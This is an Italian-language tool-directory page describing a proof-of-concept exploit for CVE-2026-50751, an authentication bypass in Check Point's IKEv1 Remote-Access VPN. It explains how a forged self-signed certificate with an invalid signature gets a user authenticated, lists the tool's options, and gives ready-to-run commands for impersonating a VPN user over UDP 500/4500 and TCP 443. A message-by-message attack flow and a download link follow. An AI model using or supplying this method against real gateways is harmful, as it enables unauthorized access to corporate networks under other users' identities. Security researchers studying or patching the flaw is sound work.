Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-50751 — Bypass dell'autenticazione tramite certificato nella VPN Remote-Access di Check Point (IKEv1). | Kitploit
Strumenti/GitHubGitHub/ull0a/cve-2026-50751
Framework di ExploitAnalisi delle VulnerabilitàExploitSicurezza di ReteCrittografiaPenetration TestingAutenticazioneRed TeamingStrumento di Accesso Remoto
GitHubull0a/cve-2026-50751

CVE-2026-50751

Bypass dell'autenticazione tramite certificato nella VPN Remote-Access di Check Point (IKEv1).

127h 45m faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-50751 — PoC

Bypass dell'autenticazione tramite certificato nella VPN Remote-Access di Check Point (IKEv1).

Descrizione

CVE-2026-50751 è un bypass dell'autenticazione nel demone iked di Check Point, presente nelle versioni R81.10, R82 e R82.10 senza l'hotfix sk185033. Il difetto consente di autenticarsi come qualsiasi utente di Remote Access provisionato senza chiave privata, senza password e senza certificato valido.

L'iked vulnerabile legge un flag dal Vendor ID VPNExtFeatures (bit 0x4) e, se attivato, omette verify_peer_auth / verifyMessagePhase1. Di conseguenza:

Non viene verificata la firma del certificato (prova di possesso).

Non viene verificata la catena di fiducia.

Si controlla solo che il subject DN risolva a un utente provisionato.

È sufficiente forgiare un certificato autofirmato il cui CN= coincida con l'utente obiettivo e inviarlo con una firma non valida. Se il gateway accetta la fase 1, siamo autenticati come quell'utente (la SA ISAKMP viene salvata sotto il suo DN).

Funziona su IKE (UDP 500/4500) e su Visitor Mode (TCPT, TCP 443).

Uso

Sintassi

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [opzioni]

Opzioni

FlagDescrizionePredefinito
-hostIP o hostname del gateway (obbligatorio)—
-userUsername RA da impersonare (obbligatorio)—
-portPorta: 500, 4500 (UDP) o 443 (TCPT)500
-orgOrganizzazione (O=) della ICA. Se omessa, viene derivata dal cert TLS—
-ouUnità organizzativa (OU=) dell'utenteusers
-timeoutTimeout per operazione6s
-retriesTentativi di msg11
-vOutput verbosofalse

Esempi

Attacco base via UDP/500

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

Forzando l'organizzazione invece di derivarla

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

Su NAT-T (UDP/4500)

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

Flusso dell'attacco

root@kitploit:~
Attaccante                                           Gateway (iked vulnerabile)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (bit 0x4) ───▶│
   │                                                          │  Legge flag 0x4
   │                                                          │  Imposta verify_peer_auth = skip
   │◀── msg2: SA accettato ───────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  Deriva SKEYID, SKEYID_e, IV                             │
   │                                                          │
   │─── msg5 (cifrato): ID=DN forgiato + CERT autofirmato    │
   │                    + firma casuale ─────────────────────▶│
   │                                                          │  Omette la verifica
   │                                                          │  della firma
   │                                                          │  Risolve DN → utente
   │◀── msg6 (cifrato): SA stabilita ─────────────────────────│
   │                                                          │
   │  Decifra msg6 con SKEYID_e → prova di autenticazione     │

Scarica lo strumento